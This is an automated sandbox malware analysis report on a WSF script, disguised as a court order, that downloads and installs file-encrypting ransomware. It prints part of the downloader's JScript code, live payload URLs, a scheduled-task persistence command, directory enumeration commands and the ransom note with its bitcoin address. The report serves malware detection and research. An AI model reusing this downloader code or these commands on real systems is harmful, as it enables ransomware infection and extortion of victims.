Analysis Report

Overview

General Information

Joe Sandbox Version: 20.0.0
Analysis ID: 348744
Start time: 11:20:02
Joe Sandbox Product: Cloud
Start date: 23.08.2017
Overall analysis duration: 0h 11m 48s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: CourtOrder_845493809.wsf
Cookbook file name: default.jbs
Analysis system description: Windows 7 (Office 2010 v14.0.4, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
  • VBA Instrumentation enabled
  • JavaScript Instrumentation enabled
Detection: MAL
Classification: mal96.evad.rans.winWSF@16/7@4/4
HCA Information:
  • Successful, ratio: 90%
  • Number of executed functions: 11
  • Number of non-executed functions: 110
EGA Information:
  • Successful, ratio: 100%
Cookbook Comments:
  • Sleeps bigger than 20000ms are automatically reduced to 500ms
  • Found application associated with file extension: .wsf
Warnings:
  • Exclude process from analysis (whitelisted): mscorsvw.exe, sppsvc.exe, WmiApSrv.exe, taskeng.exe, conhost.exe, dllhost.exe
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtQueryDirectoryFile calls found.


Detection

Strategy: Threshold
Score: 96
Range: 0 - 100
Reporting: Report FP / FN
Detection: malicious


Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification

Signature Overview



AV Detection:

Antivirus detection for dropped file
Source: C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.jpg virustotal: 18/58 detections: Emsisoft: Trojan.Ransom.BTF (B), MicroWorld-eScan: Trojan.Ransom.BTF, McAfee-GW-Edition: SyncCrypt!Zip, GData: Trojan.Ransom.BTF, Sophos: Troj/SyncCt-A, McAfee: SyncCrypt!Zip, TrendMicro: TROJ_RANSOMNOTE.AUSTYV, Cyren: JPG/SyncCrypt.A, Symantec: Trojan.Randsom.A, BitDefender: Trojan.Ransom.BTF, TrendMicro-HouseCall: TROJ_RANSOMNOTE.AUSTYV, Arcabit: Trojan.Ransom.BTF, ViRobot: JPG.S.SyncCrypt.1040099, Ikarus: Trojan.Ransom, DrWeb: Trojan.Encoder.13697, Ad-Aware: Trojan.Ransom.BTF, AhnLab-V3: BinImage/Synccrypt, F-Secure: Trojan.Ransom.BTF
Antivirus detection for submitted file
Source: CourtOrder_845493809.wsf virustotal: 36/58 detections: Avast: Other:Malware-gen [Trj], AVG: Other:Malware-gen [Trj], AegisLab: Troj.Script.Agent!c, Qihoo-360: Trojan.Generic, BitDefender: Trojan.Agent.CLKF, Emsisoft: Trojan.Agent.CLKF (B), MicroWorld-eScan: Trojan.Agent.CLKF, McAfee-GW-Edition: JS/Nemucod.xo, Fortinet: JS/Agent.SU!tr, GData: Script.Trojan-Downloader.SyncCrypt.A, Sophos: Mal/Psyme-A, McAfee: JS/Nemucod.xo, TrendMicro: JS_NEMUCOD.ELDSAUJG, Cyren: JS/Agent.SU!Eldorado, Symantec: JS.Downloader, Tencent: Js.Trojan.Raas.Auto, Panda: JS/Downloader.BRW, ZoneAlarm: HEUR:Trojan.Script.Agent.gen, TheHacker: VBS/Psyme, Rising: Trojan.Locky/JS!1.A549 (cloud:pT6AWwtp6PR), F-Prot: JS/Agent.SU!Eldorado, nProtect: Script-JS/W32.SyncCrypt-Downloader, CAT-QuickHeal: JS.Nemucod.EGL, ALYac: Trojan.Downloader.WSF.Agent, NANO-Antivirus: Trojan.Script.Heuristic-js.iacgm, Ad-Aware: Trojan.Agent.CLKF, AhnLab-V3: JS/Downloader, TrendMicro-HouseCall: JS_NEMUCOD.ELDSAUJG, Arcabit: Trojan.Agent.CLKF, Microsoft: TrojanDownloader:JS/Telicodeq.A, ViRobot: WSF.S.D

Cryptography:

Public key (encryption) found
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: -----BEGIN PUBLIC KEY-----MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAuHSaciHs234HFdvavCdAUL/dvBtWZo5e8SAkm19mQLX5VTzBoscekoJOoPHeAqGFHboj+8TQMZZl/tq5o7W4ZAjSkmEMmeNYgETNbnw8QLa1q4CtmU8W9QzTxcS+HFOo/gh0GYNMr1XqK/IksjhUYQREGnGp20jCeJmTEp+AWp5TvDtFRC/PzAVCuO 5_2_00401630
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: -----BEGIN PUBLIC KEY-----MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAuHSaciHs234HFdvavCdAUL/dvBtWZo5e8SAkm19mQLX5VTzBoscekoJOoPHeAqGFHboj+8TQMZZl/tq5o7W4ZAjSkmEMmeNYgETNbnw8QLa1q4CtmU8W9QzTxcS+HFOo/gh0GYNMr1XqK/IksjhUYQREGnGp20jCeJmTEp+AWp5TvDtFRC/PzAVCuO 5_2_00405600
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: -----BEGIN PUBLIC KEY-----MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAuHSaciHs234HFdvavCdAUL/dvBtWZo5e8SAkm19mQLX5VTzBoscekoJOoPHeAqGFHboj+8TQMZZl/tq5o7W4ZAjSkmEMmeNYgETNbnw8QLa1q4CtmU8W9QzTxcS+HFOo/gh0GYNMr1XqK/IksjhUYQREGnGp20jCeJmTEp+AWp5TvDtFRC/PzAVCuO 5_1_00401630
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: -----BEGIN PUBLIC KEY-----MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAuHSaciHs234HFdvavCdAUL/dvBtWZo5e8SAkm19mQLX5VTzBoscekoJOoPHeAqGFHboj+8TQMZZl/tq5o7W4ZAjSkmEMmeNYgETNbnw8QLa1q4CtmU8W9QzTxcS+HFOo/gh0GYNMr1XqK/IksjhUYQREGnGp20jCeJmTEp+AWp5TvDtFRC/PzAVCuO 5_1_00405600
Source: sync.exe Binary or memory string: -----BEGIN PUBLIC KEY----- MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAuHSaciHs234HFdvavCdA UL/dvBtWZo5e8SAkm19mQLX5VTzBoscekoJOoPHeAqGFHboj+8TQMZZl/tq5o7W4 ZAjSkmEMmeNYgETNbnw8QLa1q4CtmU8W9QzTxcS+HFOo/gh0GYNMr1XqK/IksjhU YQREGnGp20jCeJmTEp+AWp5TvDtFRC/PzAVCuO

Spam, unwanted Advertisements and Ransom Demands:

Writes a notice file (html or txt) to demand a ransom
Source: C:\Windows\System32\wscript.exe File dropped: C:\Users\LUKETA~1\AppData\Local\Temp\BACKUP~1\readme.html -> decryption sofware requires that you send <em>exactly the ammount of bitcoin (without the transaction fee)</em> that is written within the text file to the following address:<br><br><ul><li><em>15lk2bqxj2mjgzz3kcui3b4c42cqkkmqzk</em></li></ul><br>note that if the ammount sent doesn't match exactly the ammount in the text file, you will not receive the sofware, as it's the only way to validate and confirm the payment.<br><br><li>after the payment is done, send an email to all of the following addresses <a href="mailto:getmyfiles@keemail.me, getmyfiles@scryptmail.com, getmyfiles@mail2tor.com">getmyfiles@keemail.me, getmyfiles@scryptmail.com, getmyfiles@mail2tor.com</a> containg:</li><ul><li><em>the file named key, located within the readme folder on your desktop, as an attachment</em> - this file is a locked version of the decryption key (that must be unlocked by us), used to recover your files. do not delete it if

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: 4x nop then sub esp, 1Ch 5_2_004E6ED0
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 5_2_0045BED7
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: 4x nop then sub esp, 1Ch 5_1_004E6ED0
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 5_1_0045BED7

Networking:

Downloads files from webservers via HTTP
Source: global traffic HTTP traffic detected: GET /X8IOl.jpg HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: en-US User-Agent: curl/7.51.0 Host: sm.uploads.im
Source: global traffic HTTP traffic detected: GET /mxRqXF/arrival.jpg HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: en-US User-Agent: curl/7.51.0 Host: image.ibb.co
Found strings which match to known social media urls
Source: wscript.exe String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: wscript.exe String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: wscript.exe String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Performs DNS lookups
Source: unknown DNS traffic detected: queries for: image.ibb.co
Urls found in memory or binary data
Source: wscript.exe String found in binary or memory: file:///c:/users/user/appdata/local/temp/sfbi1uok.zipe
Source: wscript.exe String found in binary or memory: file:///c:/users/user/appdata/local/temp/sfbi1uok.zipu
Source: wscript.exe String found in binary or memory: file:///c:/users/user/desktop/courtorder_845493809.wsf
Source: wscript.exe, CourtOrder_845493809.wsf String found in binary or memory: http://185.10.202.115/images/arrival.jpg
Source: wscript.exe String found in binary or memory: http://185.10.202.115/images/arrival.jpgo
Source: wscript.exe String found in binary or memory: http://crl.comodo.net/utn-userfirst-hardware.crl0q
Source: wscript.exe String found in binary or memory: http://crl.comodoca.com/utn-userfirst-hardware.crl06
Source: wscript.exe String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: wscript.exe String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: wscript.exe String found in binary or memory: http://crl.pkioverheid.nl/domorganisatielatestcrl-g2.crl0
Source: wscript.exe String found in binary or memory: http://crl.pkioverheid.nl/domovlatestcrl.crl0
Source: wscript.exe String found in binary or memory: http://crl.usertrust.com/utn-userfirst-object.crl0)
Source: wscript.exe String found in binary or memory: http://crt.comodoca.com/utnaddtrustserverca.crt0$
Source: wscript.exe String found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: sync.exe String found in binary or memory: http://gcc.gnu.org/bugs.html):
Source: wscript.exe String found in binary or memory: http://ocsp.comodoca.com0
Source: wscript.exe String found in binary or memory: http://ocsp.comodoca.com0%
Source: wscript.exe String found in binary or memory: http://ocsp.comodoca.com0-
Source: wscript.exe String found in binary or memory: http://ocsp.comodoca.com0/
Source: wscript.exe String found in binary or memory: http://ocsp.comodoca.com05
Source: wscript.exe String found in binary or memory: http://ocsp.entrust.net03
Source: wscript.exe String found in binary or memory: http://ocsp.entrust.net0d
Source: wscript.exe, CourtOrder_845493809.wsf String found in binary or memory: http://sm.uploads.im/x8iol.jpg
Source: wscript.exe String found in binary or memory: http://uploads.im/
Source: wscript.exe String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: wscript.exe String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: sync.exe String found in binary or memory: http://www.openssl.org/support/faq.html
Source: sync.exe String found in binary or memory: http://www.openssl.org/support/faq.htmlrand
Source: wscript.exe String found in binary or memory: http://www.public-trust.com/cgi-bin/crl/2018/cdp.crl0
Source: wscript.exe String found in binary or memory: http://www.public-trust.com/cps/omniroot.html0
Source: wscript.exe String found in binary or memory: http://www.usertrust.com1
Source: wscript.exe String found in binary or memory: https://ibb.co/
Source: wscript.exe, CourtOrder_845493809.wsf String found in binary or memory: https://image.ibb.co/mxrqxf/arrival.jpg
Source: wscript.exe String found in binary or memory: https://secure.comodo.com/cps0
Uses HTTPS
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49195
Source: unknown Network traffic detected: HTTP traffic on port 49195 -> 443
Potential malicious VBS script found (has network functionality)
Source: Initial file: function busy_sleep(e){for(passed=0;passed++!=e;)for(var t=(makeid(),makeid(),(new Date).getTime()+1e3);(new Date).getTime()<t;);}function unzip(e,t){var i,o,r=new ActiveXObject("Scripting.FileSystemObject"),n=new ActiveXObject("Shell.Application");t||(t="."),r.FolderExists(t)||r.CreateFolder(t),i=n.NameSpace(r.getFolder(t).Path),o=n.NameSpace(r.getFile(e).Path),r.FileExists(e)&&i.CopyHere(o.Items(),20)}function download(e,t){var i=new ActiveXObject("MSXML2.ServerXMLHTTP");i.open("GET",e,!1),i.setRequestHeader("User-Agent","curl/7.51.0"),i.setOption(2,13056);var o=6e4,r=6e4,n=6e4,s=6e4;if(i.setTimeouts(o,r,n,s),i.send(),200==i.status){var a=new ActiveXObject("Scripting.FileSystemObject");a.FileExists(t)&&a.DeleteFile(t);var c=new ActiveXObject("ADODB.Stream");return c.Open(),c.Type=1,c.Write(i.responseBody),c.Position=0,c.SaveToFile(t),c.Close(),0}return i.status}function makeid(){for(var e="",t="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",i=0;8>i;i++)e+=t.charAt(Math.floor(Math.random()*t.

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: unknown Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /CREATE /F /TN sync /TR 'C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe -e \'C:\Users\user\desktop\'' /sc once /st 11:24:00

Stealing of Sensitive Information:

Shows file infection / information gathering behavior (enumerates multiple directories for files)
Source: C:\Windows\System32\cmd.exe Directory queried: number of queries: 1045

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\LUKETA~1\AppData\Local\Temp\BACKUP~1\sync.exe
Installs new ROOT certificates
Source: C:\Windows\System32\wscript.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: 5_2_00401500 GetModuleHandleA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress, 5_2_00401500
PE file contains sections with non-standard names
Source: sync.exe.0.dr Static PE information: section name: .eh_fram
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: 5_2_00404A24 push eax; mov dword ptr [esp], 00000000h 5_2_00404A3C
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: 5_2_0057150F push ecx; mov dword ptr [esp], ebx 5_2_00571549
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: 5_2_00401630 push eax; mov dword ptr [esp], 00000BB8h 5_2_004016AB
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: 5_2_00401630 push eax; mov dword ptr [esp], ebx 5_2_004016B9
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: 5_2_00535FC0 push eax; mov dword ptr [esp], ebx 5_2_005361C2
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: 5_2_00536D40 push eax; mov dword ptr [esp], ebx 5_2_0053703F
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: 5_2_00537310 push eax; mov dword ptr [esp], ebx 5_2_0053760F
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: 5_2_004E42D0 push eax; mov dword ptr [esp], esi 5_2_004E4345
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: 5_1_00404A24 push eax; mov dword ptr [esp], 00000000h 5_1_00404A3C
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: 5_1_0057150F push ecx; mov dword ptr [esp], ebx 5_1_00571549
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: 5_1_00401630 push eax; mov dword ptr [esp], 00000BB8h 5_1_004016AB
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: 5_1_00401630 push eax; mov dword ptr [esp], ebx 5_1_004016B9
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: 5_1_00535FC0 push eax; mov dword ptr [esp], ebx 5_1_005361C2
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: 5_1_00536D40 push eax; mov dword ptr [esp], ebx 5_1_0053703F
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: 5_1_00537310 push eax; mov dword ptr [esp], ebx 5_1_0053760F

Spreading:

Contains functionality to query local drives
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: 5_2_00401630 CreateDirectoryA,Sleep,system,system,GetLogicalDriveStringsA,lstrlenA,GetDriveTypeA,lstrlenA,ShellExecuteExA,WaitForSingleObject,GetSystemWindowsDirectoryA,tolower,tolower,remove,time,srand,rand,malloc,fopen,fwrite,fclose,fopen,fopen,malloc,malloc,fwrite,fread,fwrite,fwrite,free,free,fclose,fclose,remove,_chmod,remove,remove,remove,system,system,system, 5_2_00401630
Creates COM task schedule object (often to register a task for autostart)
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
Source: C:\Windows\System32\schtasks.exe Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exe Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exe Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exe Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Shows file infection / information gathering behavior (enumerates multiple directories for files)
Source: C:\Windows\System32\cmd.exe Directory queried: number of queries: 1045

System Summary:

Found graphical window changes (likely an installer)
Source: Window Recorder Window detected: More than 3 window changes detected
Classification label
Source: classification engine Classification label: mal96.evad.rans.winWSF@16/7@4/4
Creates files inside the user directory
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe File created: C:\Users\user\desktop\README\
Creates temporary files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.jpg
Found command line output
Source: C:\Windows\System32\schtasks.exe Console Write: ........a..u..0.............t...............................`.N...8...:...:.....P.#...N.........d.#..........WgZ..#.G..v
Source: C:\Windows\System32\cmd.exe Console Write: 1 file(s) moved
Source: C:\Windows\System32\cmd.exe Console Write: 1 file(s) moved
Reads ini files
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus (Virustotal or Metascan)
Source: CourtOrder_845493809.wsf Virustotal: hash found
Spawns processes
Source: unknown Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\CourtOrder_845493809.wsf'
Source: unknown Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /CREATE /F /TN sync /TR 'C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe -e \'C:\Users\user\desktop\'' /sc once /st 11:24:00
Source: unknown Process created: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe -e 'C:\Users\user\desktop'
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c move /y readme.html 'C:\Users\user\desktop\README\readme.html'
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c move /y readme.png 'C:\Users\user\desktop\README\readme.png'
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cmd /c net view
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c net view
Source: unknown Process created: C:\Windows\System32\net.exe net view
Source: unknown Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c dir C:\ /s /b /a-d >> WAJSFDWJWP
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /CREATE /F /TN sync /TR 'C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe -e \'C:\Users\user\desktop\'' /sc once /st 11:24:00
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c move /y readme.html 'C:\Users\user\desktop\README\readme.html'
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c move /y readme.png 'C:\Users\user\desktop\README\readme.png'
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cmd /c net view
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c dir C:\ /s /b /a-d >> WAJSFDWJWP
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c net view
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view
Uses an in-process (OLE) Automation server
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32
Found potential string decryption / allocating functions
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: String function: 00413910 appears 113 times
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: String function: 00414410 appears 267 times
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: String function: 00406EA0 appears 60 times
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: String function: 00440BB0 appears 172 times
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: String function: 004048A4 appears 48 times
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: String function: 00448F80 appears 34 times
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: String function: 00430AD0 appears 31 times
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: String function: 00413950 appears 212 times
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: String function: 004333A0 appears 119 times
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe Code function: String function: 00433B10 appears 46 times
Reads the hosts file
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Java / VBScript file with very long strings (likely obfuscated code)
Source: CourtOrder_845493809.wsf Initial sample: Strings found which are bigger than 50
Potential malicious VBS script found (suspicious strings)
Source: Initial file: function busy_sleep(e){for(passed=0;passed++!=e;)for(var t=(makeid(),makeid(),(new Date).getTime()+1e3);(new Date).getTime()<t;);}function unzip(e,t){var i,o,r=new ActiveXObject("Scripting.FileSystemObject"),n=new ActiveXObject("Shell.Application");t||(t="."),r.FolderExists(t)||r.CreateFolder(t),i=n.NameSpace(r.getFolder(t).Path),o=n.NameSpace(r.getFile(e).Path),r.FileExists(e)&&i.CopyHere(o.Items(),20)}function download(e,t){var i=new ActiveXObject("MSXML2.ServerXMLHTTP");i.open("GET",e,!1),i.setRequestHeader("User-Agent","curl/7.51.0"),i.setOption(2,13056);var o=6e4,r=6e4,n=6e4,s=6e4;if(i.setTimeouts(o,r,n,s),i.send(),200==i.status){var a=new ActiveXObject("Scripting.FileSystemObject");a.FileExists(t)&&a.DeleteFile(t);var c=new ActiveXObject("ADODB.Stream");return c.Open(),c.Type=1,c.Write(i.responseBody),c.Position=0,c.SaveToFile(t),c.Close(),0}return i.status}function makeid(){for(var e="",t="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",i=0;8>i;i++)e+=t.charAt(Math.floor(Math.random()*t.

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)
Source: sync.exe, cmd.exe | Binary or memory string: Progman
Source: sync.exe, cmd.exe | Binary or memory string: Program Manager
Source: sync.exe, cmd.exe | Binary or memory string: Shell_TrayWnd
Benign Windows process drops PE files
Source: C:\Windows\System32\wscript.exe | File created: sync.exe.0.dr

Anti Debugging:

Contains functionality to register its own exception handler
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00401170 Sleep,Sleep,SetUnhandledExceptionFilter,_acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,GetStartupInfoA,_initterm,exit, 5_2_00401170
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_1_00401170 Sleep,Sleep,SetUnhandledExceptionFilter,_acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,GetStartupInfoA,_initterm,exit, 5_1_00401170
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Windows\System32\wscript.exe | System information queried: KernelDebuggerInformation
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00415857 rdtsc 5_2_00415857
Contains functionality to dynamically determine API calls
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00401500 GetModuleHandleA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress, 5_2_00401500

Malware Analysis System Evasion:

Contains functionality to query local drives
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00401630 CreateDirectoryA,Sleep,system,system,GetLogicalDriveStringsA,lstrlenA,GetDriveTypeA,lstrlenA,ShellExecuteExA,WaitForSingleObject,GetSystemWindowsDirectoryA,tolower,tolower,remove,time,srand,rand,malloc,fopen,fwrite,fclose,fopen,fopen,malloc,malloc,fwrite,fread,fwrite,fwrite,free,free,fclose,fclose,remove,_chmod,remove,remove,remove,system,system,system, 5_2_00401630
Checks the free space of hard drives
Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00415857 rdtsc 5_2_00415857
Contains long sleeps (>= 3 min)
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Thread delayed: delay time: 3000
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Thread delayed: delay time: 1000
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Found large amount of non-executed APIs
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | API coverage: 3.1 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 3152 | Thread sleep time: -240000s >= -60s
